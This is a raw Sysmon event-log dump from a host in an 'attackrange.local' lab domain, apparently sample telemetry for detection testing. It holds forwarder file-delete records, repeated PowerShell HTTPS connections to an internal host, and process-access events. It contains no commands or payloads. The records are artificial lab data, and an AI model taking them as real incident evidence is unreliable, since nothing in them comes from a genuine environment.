23542300x800000000000000035341852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:42.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A347EC159C3E7D58C8CEA9C5600B6A,SHA256=5CC05B7080F414FE9C043F0D9459AD78A2EB8A8CE38725F66EE4FB1F4B6EC56B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:43.249{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C4A63C029A5F0D5A9015B989B25831,SHA256=CC6EA6F8759A0C205294EB198A63EAEC767ABBB32DA14041DE57725EA84B8681,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:07.827{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52348-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:44.864{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=03AAC9C7219A94AD1CDC926F311769D3,SHA256=0B093AD579803F23B27F0763BA4C26BE602E0AAB12C65424B52A9BBBC7D0EC1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:44.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A1ADCCFA8E15A7F4A7CC842B03B6EB,SHA256=D8C9D3117C1F5DD87E087CD8D3AFA67E32200DA31F0D4C043ADEEAD5FA5E9AE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:08.126{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52349-false10.0.1.12-8000- 23542300x800000000000000035341859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:45.926{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2D4AB29557AF8CCDCC4D63F78E5B71D5,SHA256=90B9E7D6B1CD2A835A142954A774FF7EF3E5741675510D24A597C89AAFDA767A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:45.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB1C76427108D0F6880A0809F76971B8,SHA256=EC1833C63E8789FB8FD4D5EA82DDB05DE7A19A4494D05486BF897EFC74922F56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:11.839{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52350-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:46.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A1E3367F6412875A3EADA27BE096DA7,SHA256=E0B2E498A061696BDC4A2A2FD60C2C5B0A1672669F532D5EFCF9D5811459A5DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:13.175{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52351-false10.0.1.12-8000- 23542300x800000000000000035341862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:47.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEEBCB4C3B034286E42DCF209F1B4073,SHA256=789D04984A97333FD5BC9C644BFCF8626CEABDEBFDC084B1CF49803DCF9EF25D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:48.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C25BB885B5B0D2DE9394F014998F49,SHA256=11551F81AD81B18AD8D2EED596A0CAAAC9F0DAF093677CE61B329EAA5AAB44EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:49.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEFC80223EDCE735B6A28DADD651E97,SHA256=28BF430BE2B60CEB9545D367F14F2B5EDD52D5527A8F6C3AC23FD71F751F915E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:50.405{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688E89A214CAA0660D2881F0CD00DAA0,SHA256=BF2F1E8C371505EB517951D2E8EE2C3766EF7828FEA3A3BF52D482C542FC287E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:51.406{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05C80A64717326A31DBC845DCE57BDB,SHA256=DF0C93E5072833818B8294C30EF3C796A2FDEEEC8B678F8089D9636DAC4FF032,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:51.141{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D0822918B37C87DCA59558AC7586F2AD,SHA256=8F7CA56FDE7600C98DC94657F4AE15C56529B0E7A6AA11B061DD4E1F965F9641,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:52.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20113D87D0F6D3D61C0C4F0E18C88DE,SHA256=3570766CAF40C871505BFFCADAAC5CAC4803800F8CE1A1094CF25A1611B82AEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.857{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52352-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:53.438{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4F779743685450CB86DE2A894CBC0E,SHA256=34BCFD3C9DCCBBBFDD0493A222B94D43AB68D497A00301CCF9BD4A3ADE2D2F74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:18.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52353-false10.0.1.12-8000- 23542300x800000000000000035341873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:54.472{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF35B51A259E00398D45D03467F5B80,SHA256=CF5816C4D86F174D02EED706AD7E5C98BF9560180F943C68113C8D48E98C5BF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:55.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E973E38F3724724E2A0A0C831EC9AADD,SHA256=49F49FFEB4014258DEE3D7BA0F97B666673B32CFA12B506F38E3DAFE118328BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:56.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37554285EC7C938918EBAB12C1BBAF8,SHA256=C4F2F8A77427B34253E01150F85B664A3CEB6271912FA2A7F4BF00C32F74D457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:57.537{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0FDE779D543972A968A227F4702AD7,SHA256=19E532600EFC9A35A189B25EBF89A35E4718B9467EDE76EF919B7FC8919BB37B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:57.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AD0AE0A3A30100F334B3DD3AED540EF5,SHA256=FEB54D5935BA35FAB46C63FE5EDFFCC9EC1DE96552C3F28CB938F0578CB30182,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:58.557{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C662FB31629B2C779DDAA2576523A3A,SHA256=7B11B3143F2D40E7637C443D25791CC334D3D00B13D7A393148306C576A98155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:22.871{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52355-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:59.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB282794324AE4ABCED11BFE0A3F2604,SHA256=D9CD5FE73B8B8F6379AF96B6E16510F96876EB645ED9E3266A1D4CFE44ACE90B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:24.070{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52356-false10.0.1.12-8000- 23542300x800000000000000035341883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:00.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAD8BB9386D50E541498D03B39A21441,SHA256=4957944A3646468E1C6741FA9344AE1A834875D7EB6F689A244E2ED0DD4DD5DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:00.588{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD3089CE2A8623203D576B5A64CC7C4,SHA256=93F8C6DE6757D73804A9558A313DA04FB8AAC3DDBCE52539BAFAF9B9747A2097,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:01.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB9D21895A34D7A23DC60948AF4D8C14,SHA256=7BEB33D2535F24738E418AE0FDE3F09D1CC6097ED3C6A3D853242EBFFF9ACFF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:02.616{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0985706C7385DA3651E8C2432058B15C,SHA256=637FADE0988CA39D274E35CA7525CCD87792DBD521FF5B0385EF6A146E06A91E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:26.884{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52357-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:03.668{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBC7C13CDEAAE3A9DE05AB66CB6CF1A,SHA256=4C073DC0A628D6C8B5BE0270E2F646789BB5E7BD3F280FDCED526F21001D4508,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=35608089F9F3F603A0521671DD1D9F09,SHA256=C9B4FAF8149266AE3AEEB496FDAD2A709563DBDA2CE299FB50CCD03985EC9448,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7240-613B-21B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7240-613B-21B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.788{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7240-613B-21B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.773{B81B27B7-7240-613B-21B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E88A982740F502507AC5514FDDD807,SHA256=0A67AB643DB241D73F7BCD77CCFA8CD03EE571EDA990C8B377AF6AC554E10032,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 